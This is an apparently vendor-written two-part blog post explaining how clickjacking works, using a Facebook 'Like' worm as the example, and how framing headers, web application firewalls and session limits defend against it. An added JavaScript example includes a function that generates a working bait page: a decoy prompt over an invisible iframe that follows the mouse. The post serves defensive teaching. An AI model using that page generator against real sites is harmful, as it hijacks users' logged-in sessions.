While the Facebook attack shown in our previous blog entry is more of a nuisance, it still illustrates the potential danger of clickjacking within the context of social networks. This attack demonstrates how a smart attacker can use social channels to spread malware by spoofing trusted users within the social group. More importantly, attacks of this sort can quickly morph into more serious attacks when combined with more sophisticated techniques such as a Cross-Site Request Forgery (CSRF) attack or password-stealing Trojans. Imagine if an attacker injects a clickjacking script onto a legitimate Web site that tricks the user into submitting a forged request. Because the request is generated by the victim’s own browser during a valid session, complete with the session cookies, it is extremely difficult for the application to detect that the request was not intended.

Clickjacking Prevention Must Start at the Client Browser

The key solution to preventing clickjacking is to improve Web browser functionality to detect and defend against hidden iFrames and malicious JavaScript. The main browser platforms have already begun to add clickjacking prevention:

  • The third-party NoScript add-on for Mozilla Firefox blocks scripting from untrusted domains, and its ClearClick feature warns the user when a click would land on a hidden or partially obscured frame
  • Microsoft Internet Explorer (from IE8), Apple Safari, and Google Chrome honour the X-Frame-Options HTTP response header, which lets the site serving a page declare whether the page may be framed at all (DENY) or only by pages from the same origin (SAMEORIGIN); the browser enforces it, but the application has to send it

While these are a step in the right direction, it will take some time before they solve the clickjacking problem: the header only helps on sites whose developers send it, and the general public is slow to update or patch their browsers.
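To see what the X-Frame-Options check above actually decides, here is an added example (not Barracuda code and not part of the original post) that builds anti-framing response headers and then evaluates, for a captured set of headers, whether a page from one origin may be framed by a document from another. X-Frame-Options is the header the post refers to; the Content-Security-Policy frame-ancestors directive is its later successor and is included so the check covers both. The origins used in the comments are hypothetical, origins are compared as exact strings, and CSP host wildcards such as *.example.com are not handled.

```javascript
'use strict';
// Added example: build anti-framing headers and evaluate whether a set of
// response headers permits framing. Not Barracuda code; origins are examples.

// Headers for a page that must never be framed (the safe default).
function denyFramingHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// Headers for a page that may be framed only by its own origin.
function sameOriginFramingHeaders() {
  return {
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': "frame-ancestors 'self'",
  };
}

// Case-insensitive header lookup, since HTTP header names are case-insensitive.
function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? undefined : String(headers[key]);
}

// Would a browser honouring these headers let a document at framerOrigin
// embed the page served from pageOrigin? Returns true when framing is allowed.
function framingAllowed(headers, pageOrigin, framerOrigin) {
  const page = pageOrigin.toLowerCase();
  const framer = framerOrigin.toLowerCase();

  // A CSP frame-ancestors directive, when present, wins over X-Frame-Options.
  const csp = getHeader(headers, 'Content-Security-Policy');
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      // An empty source list or 'none' forbids all framing.
      if (sources.length === 0 || sources.includes('none')) return false;
      return sources.some((src) =>
        src === '*' || src === framer || (src === 'self' && framer === page));
    }
  }

  const xfo = getHeader(headers, 'X-Frame-Options');
  if (xfo === undefined) return true; // no policy at all: any site may frame the page
  const value = xfo.trim().toUpperCase();
  if (value === 'DENY') return false;
  if (value === 'SAMEORIGIN') return framer === page;
  if (value.startsWith('ALLOW-FROM ')) { // obsolete form, never supported by every browser
    return value.slice('ALLOW-FROM '.length).trim().toLowerCase() === framer;
  }
  return true; // browsers ignore an unrecognised value and render the page framed
}
```

A practical use is to capture your own site’s response headers (for example with `curl -I`) and feed them to `framingAllowed` with an attacker-controlled origin as `framerOrigin`; a result of `true` for any login or action page means the page is exposed to the hidden-frame attack described above.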

Server-Side Solutions that Can Limit the Risk of Clickjacking

Until all browsers address clickjacking, organizations need to focus on prevention and mitigation. Several steps can be taken to reduce the risk:

1. Install a Spam & Virus Firewall

Clickjacking starts by tricking users into visiting a page the attacker controls. One major vector is spam or spoofed email carrying the bait link. Blocking spam is key to stopping clickjacking at the source.

2. Filter Web Traffic and Block Malicious Sites

Web filters can block users from accessing dangerous sites known to host clickjacking pages, whether or not the email that linked to them was caught.

3. Protect your Web Applications from Clickjacking Scripts

Web Application Firewalls can inspect submitted content for malicious scripts and stop attackers from injecting clickjacking code, such as hidden frames, into your own Web site.

4. Protect your Web Application Forms

Web Application Firewalls can inject nonces (one-time tokens) into HTTP forms and reject submissions that do not carry a valid one, which limits exposure to forged form submissions sent from another origin. Note what this does and does not cover: a click delivered through an invisible frame submits the genuine form together with its valid nonce, so the nonce stops the CSRF that clickjacking is often combined with, not the clickjacked click itself; framing controls such as X-Frame-Options are what block the hidden frame. Application Firewalls can also validate form parameter inputs to prevent malicious input from being sent to the Web servers.

5. Periodically Log-out Users

Web applications that keep users logged in indefinitely (like Facebook) are exposed to forged requests launched by clickjacking for as long as the session lasts. Sessions should expire after a period of inactivity and users should be logged out periodically to limit the window of exposure.

Outlook

Clickjacking is a challenging client-side vulnerability that ultimately needs to be solved by the Web browser platforms. The major Web platform vendors are already working on clickjacking solutions, and organizations must ensure that their users are installing the latest patches as they are released. Finally, organizations can limit the scope of damage and the windows of opportunity for clickjacking to take place by applying preventative countermeasures through the use of Web Application Firewalls, Spam & Virus Firewalls, and/or Web Filters.


Anatomy of a Clickjacking Attack

Monday, June 14th, 2010

Posted by:  Oliver Wai, product marketing manager

This is part one of a two-part post on how Web site clickjacking attacks work, and how to prevent them.

The success of Facebook clickjacking is due in large part to the social nature of the Web site. Users of Facebook are much more likely to click on a particular link if they believe that the link was posted by a friend. Unfortunately, attackers also understand this dynamic and, as a result, they are using Facebook as a new vector to deliver attacks.

What is Clickjacking?

Clickjacking (aka user interface (UI) redressing) is an attack where an attacker has injected malicious content onto a compromised or attacker-controlled page (Web site A) to trick the user into clicking on a link or button from another domain (Web site B). Typically the attack is set up by creating an invisible or disguised iFrame on Web site A that loads Web site B and is positioned so that a UI button on Web site B sits under the spot the user is about to click. The button could be used to launch a forged cross-site request, to download malware, or for any other malicious activity.

How does this Apply to Facebook?

In the recent Facebook Clickjacking attacks, an attacker sets off a variant of a Facebook worm that sends users to a clickjacked Web page that exploits Facebook’s “Like” infrastructure. This is accomplished through a series of well-designed steps:

1. Find the Victims.

The attacker likely created a spam email, banner ad or some other type of bait to trick people into clicking the malicious link. The bait could be a spoofed link to pornography, free products, celebrity gossip, or any other enticement. For our example, let’s assume the bait is an email with a link that says “Check this New Video of a Dancing Bear!”

2. Clickjack the Victims’ Facebook Accounts.

Once the victim clicks on the bait link, it takes the user to an intermediary page displaying a warning that asks the user to “Click to continue” or “Verify that you are at least 18 years old” to view the video. This is where the clickjacking occurs. On this page there is an invisible iFrame, loaded with a Facebook page, that uses JavaScript to silently follow the user’s mouse pointer so that the Facebook “Like” button is always directly under it. No matter where the user clicks on the page, the click lands on the hidden iFrame and is delivered to the button in the user’s logged-in Facebook session.

3. Spread to the Victims’ Social Networks.

Because most users are permanently logged into Facebook, when the user clicks anywhere on the clickjacked page, a link is published on the victim’s profile with the same text used to lure the original victim of the attack:

“Check this New Video of a Dancing Bear!”

This post appears in the News Feed of all of the victim’s Facebook friends. If any of those friends clicks the link, they are also sent to the clickjacked page. If the new victim clicks anywhere on the page, the “Like” is added to their Facebook profile too, starting the cycle again.
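The “invisible iFrame that follows the mouse” step (step 2 above), as an added example that is not part of the original post and not real attack code from any campaign: the geometry an attacker needs is simply the offset that puts the target button’s centre under the cursor, recomputed on every mouse move. The target URL, the button position inside the framed page and the decoy text are hypothetical; the same functions also show why the trick fails when the target sends an anti-framing header, because the frame then renders empty and no button can be placed under the click.

```javascript
'use strict';
// Added example: the positioning behind a mouse-following invisible frame.
// Target URL and button rectangle are hypothetical values for illustration.

// Where the target's button sits inside the framed page, in CSS pixels.
// An attacker measures this once by loading the target in a visible frame.
const TARGET_BUTTON = { left: 420, top: 310, width: 90, height: 24 };

// The iframe offset (bait-page coordinates) that places the button's centre
// exactly under the cursor at (cursorX, cursorY).
function frameOffsetForCursor(cursorX, cursorY, button = TARGET_BUTTON) {
  return {
    left: cursorX - (button.left + button.width / 2),
    top: cursorY - (button.top + button.height / 2),
  };
}

// Does a click at (x, y) on the bait page land inside the framed button once
// the frame is placed at `offset`? This is the check that the attack relies on.
function clickHitsButton(x, y, offset, button = TARGET_BUTTON) {
  const l = offset.left + button.left;
  const t = offset.top + button.top;
  return x >= l && x < l + button.width && y >= t && y < t + button.height;
}

// The bait page: a decoy prompt plus a fully transparent, top-most iframe that
// a mousemove handler repositions with the same arithmetic as above. If the
// framed site sends X-Frame-Options: DENY, the browser leaves the frame blank
// and the click hits nothing.
function baitPageHtml(targetUrl, button = TARGET_BUTTON) {
  return `<!doctype html>
<p>Check this New Video of a Dancing Bear! Click to continue.</p>
<iframe id="f" src="${targetUrl}" scrolling="no"
  style="position:absolute;opacity:0;border:0;width:1000px;height:800px;z-index:10"></iframe>
<script>
  const btn = ${JSON.stringify(button)};
  const f = document.getElementById('f');
  document.addEventListener('mousemove', (e) => {
    f.style.left = (e.pageX - (btn.left + btn.width / 2)) + 'px';
    f.style.top = (e.pageY - (btn.top + btn.height / 2)) + 'px';
  });
</script>`;
}
```

Reading `clickHitsButton` against `frameOffsetForCursor` makes the defence obvious: the attacker controls the frame’s offset but not whether the browser renders the framed page, so a target that refuses framing (X-Frame-Options or CSP frame-ancestors) removes the button the click is meant to hit.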

Check out part two of this post on how to prevent a clickjacking attack.
